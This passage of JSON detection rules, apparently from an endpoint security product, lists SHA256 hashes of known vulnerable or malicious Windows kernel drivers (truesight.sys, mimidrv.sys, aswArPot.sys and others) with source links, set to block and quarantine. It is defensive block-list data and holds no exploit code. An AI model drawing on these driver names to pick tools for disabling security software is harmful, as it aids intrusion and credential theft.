+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "1ab7195c-97f4-5a9d-8fe8-abb26d1aacf9",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.828275Z",
+ "creation_date": "2026-03-23T11:45:30.828277Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.828282Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "5d4da5704e1c198d6925473d42c11932485dfcb60d59dbfdd2f9459e3589286f",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "1ab8f1a7-8ef9-5fb6-82c6-6ee89df0ba1d",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.483147Z",
+ "creation_date": "2026-03-23T11:45:31.483151Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.483161Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "4216ccb7c3d275f6ca2e093ccfc50b8e4e76709d80ed723eb2d9d64aa0e90d87",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "1abd5bc8-7649-5b4d-abf2-2717cf6ef1ac",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.466664Z",
+ "creation_date": "2026-03-23T11:45:30.466667Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.466676Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "4bca0a401b364a5cc1581a184116c5bafa224e13782df13272bc1b748173d1be",
+ "comment": "Malicious Kernel Driver (aka mimidrv.sys) 
[https://www.loldrivers.io/drivers/87752fb8-e9f6-4235-91e2-c4343677d817/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "1ac73fb4-7e4c-5f43-8dd8-24341e7d9502", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.819428Z", + "creation_date": "2026-03-23T11:45:30.819430Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.819436Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "d54ac69c438ba77cde88c6efd6a423491996d4e8a235666644b1db954eb1da9c", + "comment": "Vulnerable Kernel Driver (aka nvoclock.sys) [https://blogs.vmware.com/security/2023/10/hunting-vulnerable-kernel-drivers.html] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "1ac96720-2eeb-59e3-8927-f2904b1369f9", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.983369Z", + "creation_date": "2026-03-23T11:45:29.983371Z", + "enabled": true, + 
"block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.983376Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "97030f3c81906334429afebbf365a89b66804ed890cd74038815ca18823d626c", + "comment": "Vulnerable Kernel Driver (aka kbdcap64.sys) [https://www.loldrivers.io/drivers/6a7d882b-3d9d-4334-be5f-2e29c6bf9ff8/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "1ad0a164-fba5-55ce-b1a3-905ca6fbd8a4", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.465511Z", + "creation_date": "2026-03-23T11:45:30.465515Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.465523Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "b34e2d9f3d4ef59cf7af18e17133a6a06509373e69e33c8eecb2e30501d0d9e4", + "comment": "Malicious Kernel Driver (aka mimidrv.sys) [https://www.loldrivers.io/drivers/87752fb8-e9f6-4235-91e2-c4343677d817/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "1aebafa2-5e96-584c-94f6-5fae7cfbfc9e", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", 
+ "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.969076Z", + "creation_date": "2026-03-23T11:45:29.969078Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.969083Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "0f17e5cfc5bdd74aff91bfb1a836071345ba2b5d1b47b0d5bf8e7e0d4d5e2dbf", + "comment": "Avast Vulnerable Driver (aka aswArPot.sys) [CVE-2022-26522, CVE-2022-26523] [https://www.mandiant.com/resources/blog/unc2596-cuba-ransomware] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "1b099f55-0316-5967-95d4-04b2190aa9d0", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.604374Z", + "creation_date": "2026-03-23T11:45:29.604376Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.604381Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": 
"hash", + "value": "761ca3aee052d4a34f500dee578ef55a4e481b1d6096eb3573f3f828ecfe4f89", + "comment": "Vulnerable Kernel Driver (aka BEDAISY.SYS) [https://www.loldrivers.io/drivers/db666d40-c9fa-4039-bfac-a5d7afd61b67/] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "1b0cd3ea-e28e-5b2a-a040-c14bf801a7e1", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.819784Z", + "creation_date": "2026-03-23T11:45:31.819788Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.819797Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "d8a2e2d3b845d658150e656153e40e6c741cdaa2627ed940e9875ca42472ba82", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "1b175542-d22b-5431-8403-43467b2826fb", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + 
"username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.489004Z", + "creation_date": "2026-03-23T11:45:31.489006Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.489012Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "1dd2feaa9b18b3ba4187167557107e5bc331837f607e1a7adcbc7192700d1b80", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "1b17bc16-e852-5ee3-a3d1-e63ed949fad3", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.473630Z", + "creation_date": "2026-03-23T11:45:30.473633Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.473642Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "2c27ad462ed0e16252b834cf0c76b1c5085ad9b7b6a13f67d1d2471177f1b177", + "comment": "Vulnerable Kernel Driver (aka cpuz.sys) 
[https://www.loldrivers.io/drivers/0f59ce3b-20ac-41ba-8010-2abc74827eb8/] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "1b2f0f9e-5f0f-57b9-9586-6a0c4076a36b", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.982713Z", + "creation_date": "2026-03-23T11:45:29.982715Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.982720Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "97cada65b735f3eece349c7b7021c4469d5a9fb3cf8b5e2ac187006469ffbc98", + "comment": "Vulnerable Kernel Driver (aka SysDrv3S.sys) [https://www.loldrivers.io/drivers/cf49f43c-d7b4-4c1a-a40d-1be36ea64bff/] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "1b34914b-2ad9-5fcd-90bd-828c893d5883", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.830825Z", + "creation_date": "2026-03-23T11:45:30.830827Z", + "enabled": true, + 
"block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.830833Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "197ff39f37973f12175188c41007cb555f569a310f36ce3a613a0989385275a5", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "1b3b66b5-4ede-5845-944e-5c0b7c153d4d", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.145218Z", + "creation_date": "2026-03-23T11:45:31.145220Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.145225Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "529b3ad0f683ce1d5dc236692c68f2c990aa09d816fd4d9e35a1e94a8aaf417a", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "1b4bc9d3-46f5-5ce1-9f9e-c2000432c34b", + 
"test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.489551Z", + "creation_date": "2026-03-23T11:45:31.489555Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.489563Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "a43eda51f8bea611289c52ca96ec4f703c895d1cba72232fe8a7388945ea6dfd", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "1b4d7b86-08d0-55d4-9615-1e09bbcb3118", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.145893Z", + "creation_date": "2026-03-23T11:45:31.145897Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": 
"2026-03-23T11:45:31.145905Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "4653fb7161bc0f5af4057778d8f9d5aa865923db472220479033448a403c007f", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "1b61eb18-4d0c-547f-ad60-52e1234277bc", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.973906Z", + "creation_date": "2026-03-23T11:45:29.973908Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.973913Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "adc10de960f40fa9f6e28449748250fa9ddfd331115b77a79809a50c606753ee", + "comment": "Trend Micro Anti-Rootkit Common Module vulnerable driver (aka TmComm.sys) [CVE-2007-0856] [https://www.loldrivers.io/drivers/22aa985b-5fdb-4e38-9382-a496220c27ec/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "1b675bb8-aa03-5acf-8bb0-7b6f92a5f316", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": 
"quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.817365Z", + "creation_date": "2026-03-23T11:45:30.817367Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.817372Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "4ce5523dea824b2f2d4d442a9016d0f1b7cc52dce58a1740f4c43fd28e1c6dcb", + "comment": "Vulnerable Kernel Driver (aka AODDriver.sys) [https://blogs.vmware.com/security/2023/10/hunting-vulnerable-kernel-drivers.html] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "1b736bdf-8e4f-5d39-9022-99852b2f46d0", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.818066Z", + "creation_date": "2026-03-23T11:45:30.818068Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.818074Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": 
"6ef0b34649186fb98a7431b606e77ee35e755894b038755ba98e577bd51b2c72", + "comment": "Vulnerable Kernel Driver (aka kerneld.amd64) [https://blogs.vmware.com/security/2023/10/hunting-vulnerable-kernel-drivers.html] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "1b7abaea-b19e-54f3-b5e0-148ad62060d2", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.458250Z", + "creation_date": "2026-03-23T11:45:30.458254Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.458262Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "49ef680510e3dac6979a20629d10f06822c78f45b9a62ec209b71827a526be94", + "comment": "Vulnerable Kernel Driver (aka nscm.sys) [https://www.loldrivers.io/drivers/351ff5ca-f07b-4eb6-9300-d5d31514defb/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "1b7af6a4-bb22-5935-8d9a-c28de969b594", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + 
"last_update": "2026-03-23T11:45:29.622562Z", + "creation_date": "2026-03-23T11:45:29.622564Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.622569Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "72c0d2d699d0440db17cb7cbbc06a253eaafd21465f14bb0fed8b85ae73153d1", + "comment": "PassMark vulnerable driver (aka DirectIo32.sys and DirectIo64.sys) [CVE-2020-15479] [https://github.com/eset/vulnerability-disclosures/blob/master/CVE-2020-15479/CVE-2020-15479.md] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "1b8bdd30-526f-51da-8967-b823cc336470", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.826586Z", + "creation_date": "2026-03-23T11:45:30.826588Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.826593Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "072397e33f2bb44596c3c188a570b18628921456621b0eba8f6ba4b71035064c", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file 
SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "1b8fa0de-40b4-54fa-9223-780a6c48c933", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.459460Z", + "creation_date": "2026-03-23T11:45:30.459463Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.459472Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "1a0f57a4d7c8137baf24c65d542729547b876979273df7a245aaeea87280c090", + "comment": "Vulnerable Kernel Driver (aka netfilter2.sys) [https://www.loldrivers.io/drivers/5ad8a3b6-6d20-4c95-8fa7-9a507167ba3c/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "1b9adada-ebd4-5a46-b917-3049f1f02a50", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.817959Z", + "creation_date": "2026-03-23T11:45:30.817961Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + 
